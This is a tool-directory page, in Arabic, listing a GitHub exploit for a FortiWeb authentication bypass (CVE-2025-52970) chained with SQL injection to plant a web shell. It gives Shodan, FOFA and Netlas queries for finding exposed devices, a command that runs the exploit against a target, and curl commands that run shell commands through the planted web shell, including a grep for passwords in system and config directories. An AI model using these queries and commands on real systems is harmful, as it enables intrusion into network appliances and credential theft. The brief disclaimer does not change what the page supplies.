Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — يُظهر تجاوزًا للمصادقة في FortiWeb (CVE-2025-52970) مقترنًا بحقن SQL لتحميل شِل ويب وتحقيق تنفيذ الأوامر عن بُعد عبر رؤوس HTTP. | Kitploit
أدوات/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

يُظهر تجاوزًا للمصادقة في FortiWeb (CVE-2025-52970) مقترنًا بحقن SQL لتحميل شِل ويب وتحقيق تنفيذ الأوامر عن بُعد عبر رؤوس HTTP.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
9313منذ سنة واحدةلم تتم المراجعة بعد

🚨 تجاوز المصادقة في FortiWeb → تنفيذ الأوامر عن بُعد

📌 نظرة عامة

يوضح هذا المستودع تجاوز المصادقة في FortiWeb والذي يمكن ربطه لتحقيق تنفيذ الأوامر عن بُعد (RCE).
يستغل الثغرة نقطة نهاية ضعيفة لحقن حمولات SQL، تحميل ويب شيل، وتنفيذ الأوامر عبر رؤوس HTTP.

⚠️ إخلاء مسؤولية:
هذا المشروع لأغراض تعليمية وبحثية فقط.
لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

Netlas وFOFA وShodan

Screenshot 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 تفاصيل الثغرة

  • CVE: CVE-2025-52970

  • المكون: FortiWeb Fabric API (/api/fabric/device/status)

  • التأثير: تجاوز المصادقة → حقن SQL → تحميل ويب شيل → RCE

  • الناقل: رأس Authorization مصمم + حقن SQL

🧑‍💻 سير عمل الاستغلال

  1. حذف وإنشاء جدول SQL مؤقت.

  2. كتابة حمولة الويب شيل في أجزاء.

  3. تصدير الشيل إلى /cgi-bin/x.cgi.

  4. تحميل نص Python مساعد لتشغيل الأذونات.

  5. الوصول إلى الويب شيل بإرسال الأوامر عبر رأس User-Agent.

    ⚙️ الاستخدام

1️⃣ استنساخ المستودع

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

Screenshot 2025-08-23 114753 Screenshot 2025-08-23 114915

3️⃣ التفاعل مع الويب شيل

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
Screenshot 2025-08-23 114521
تنزيل الأداة